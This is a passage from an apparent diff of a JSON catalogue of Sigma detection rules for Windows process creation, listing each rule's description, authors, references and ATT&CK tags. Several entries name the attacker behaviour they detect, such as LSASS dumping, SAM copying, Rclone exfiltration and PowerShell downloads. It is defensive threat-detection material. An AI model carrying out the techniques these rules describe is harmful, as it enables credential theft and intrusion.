ACLs" + ], + "filename": "proc_creation_win_susp_powershell_sam_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1420546784250769408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "1af57a4b-460a-4738-9034-db68b880c665", + "value": "PowerShell SAM Copy" + }, + { + "description": "Detects suspicious sub processes spawned by PowerShell", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_sub_processes.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ankit_anubhav/status/1518835408502620162", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" + ], + "tags": "No established tags" + }, + "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "value": "Suspicious PowerShell Sub Processes" + }, + { + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "value": "Net WebClient Casing Anomalies" + }, + { + "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Other tools with the same command line flag combination", + "Legitimate uses as part of Visual Studio development" + ], + "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1463526834918854661", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "value": "NodejsTools PressAnyKey Lolbin" + }, + { + "description": "Attackers can use print.exe for remote file copy", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_print.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "value": "Abusing Print Executable" + }, + { + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. 
This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/10/30", + "falsepositive": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "filename": "proc_creation_win_susp_procdump_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" + ] + }, + "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", + "value": "Suspicious Use of Procdump on LSASS" + }, + { + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/10", + "falsepositive": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "filename": "proc_creation_win_susp_process_hacker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://processhacker.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" + ], + "tags": "No established tags" + }, + "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", + "value": "Process Hacker / System Informer Usage" + }, + { + "description": "Detects suspicious patterns in program names or folders that are often found in malicious 
samples or hacktools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate tools that accidentally match on the searched patterns" + ], + "filename": "proc_creation_win_susp_progname.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" + ], + "tags": "No established tags" + }, + "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "value": "Suspicious Program Names" + }, + { + "description": "Detects user accept agreement execution in psexec commandline", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/30", + "falsepositive": [ + "Administrative scripts." + ], + "filename": "proc_creation_win_susp_psexec_eula.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "attack.t1021" + ] + }, + "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", + "value": "Psexec Accepteula Condition" + }, + { + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "meta": { + "author": "Romaissa Adjailia, FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "value": "PsExec Service Execution" + }, + { + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "value": "PsExec Service Execution as LOCAL SYSTEM" + }, + { + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "meta": { + "author": "FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc_renamed.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "value": "Renamed PsExec Service Execution" + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/11/23", + "falsepositive": [ + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" + ], + "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/05/22", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + ], + "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + 
"https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "207b0396-3689-42d9-8399-4222658efc99", + "value": "PsExec/PAExec Flags" + }, + { + "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" + ], + "filename": "proc_creation_win_susp_psloglist.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" + ] + }, + "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "value": "Suspicious Use of PsLogList" + }, + { + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + 
"refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", + "value": "Psr.exe Capture Screenshots" + }, + { + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/09", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_ps_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "value": "PowerShell Script Run in AppData" + }, + { + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ps_downloadfile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" + ] + }, + "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "value": "PowerShell DownloadFile" + }, + { + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "value": "Suspicious PowerShell Obfuscated PowerShell Code" + }, + { + "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_radmin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", + "https://www.radmin.fr/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ] + }, + "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "value": "Use Radmin Viewer Utility" + }, + { + "description": "Detects the use of 
rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" + ], + "filename": "proc_creation_win_susp_rar_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://ss64.com/bash/rar.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", + "value": "Rar Usage with Password and Compression Level" + }, + { + "description": "Detects suspicious process related to rasdial.exe", + "meta": { + "author": "juju4", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rasdial_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/subTee/status/891298217907830785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "value": "Suspicious RASdial Activity" + }, + { + "description": "Detects a explorer.exe sub process of the RazerInstaller software 
which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "meta": { + "author": "Florian Roth, Maxime Thiebaut", + "creation_date": "2021/08/23", + "falsepositive": [ + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + ], + "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/j0nh4t/status/1429049506021138437", + "https://streamable.com/q2dsji", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1553" + ] + }, + "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "value": "Suspicious RazerInstaller Explorer Subprocess" + }, + { + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "meta": { + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/10", + "falsepositive": [ + "Legitimate RClone use" + ], + "filename": "proc_creation_win_susp_rclone_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "value": "Rclone Execution via Command Line or PowerShell" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "value": "Recon Information for Export with Command Prompt" + }, + { + "description": "Detects a set of suspicious network related commands often used in recon stages", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/07", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_recon_network_activity.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "value": "Network 
Reconnaissance Activity" + }, + { + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", + "value": "Regedit as Trusted Installer" + }, + { + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "meta": { + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_register_cimprovider.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PhilipTsukerman/status/992021361106268161", + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574" + ] + }, + "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", + "value": "DLL Execution Via Register-cimprovider.exe" + }, + { + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_registration_via_cscript.yml", + "level": "medium", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://ss64.com/vb/cscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", + "value": "Suspicious Registration via cscript.exe" + }, + { + "description": "Detects various anomalies in relation to regsvr32.exe", + "meta": { + "author": "Florian Roth, oscd.community, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ] + }, + "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "value": "Regsvr32 Anomaly" + }, + { + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "value": "Regsvr32 Flags Anomaly" + }, + { + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "FQDNs that start with a number" + ], + "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", + "https://twitter.com/tccontre18/status/1480950986650832903", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "value": "Suspicious Regsvr32 HTTP IP Pattern" + }, + { + "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", + "meta": { + "author": "frack113", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "value": "Suspicious Regsvr32 Execution With Image 
Extension" + }, + { + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_no_dll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ] + }, + "uuid": "50919691-7302-437f-8e10-1fe088afa145", + "value": "Regsvr32 Command Line Without DLL" + }, + { + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "value": "Suspicious Regsvr32 Execution From Remote Share" + }, + { + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "meta": { + "author": "elhoim", + "creation_date": "2022/05/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "value": "Regsvr32 Spawning Explorer" + }, + { + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Rare legitimate add to registry via cli (to these locations)" + ], + "filename": "proc_creation_win_susp_reg_add.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ] + }, + "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "value": "Reg Add Suspicious Paths" + }, + { + "description": "Detects suspicious addition to BitLocker related registry keys via the 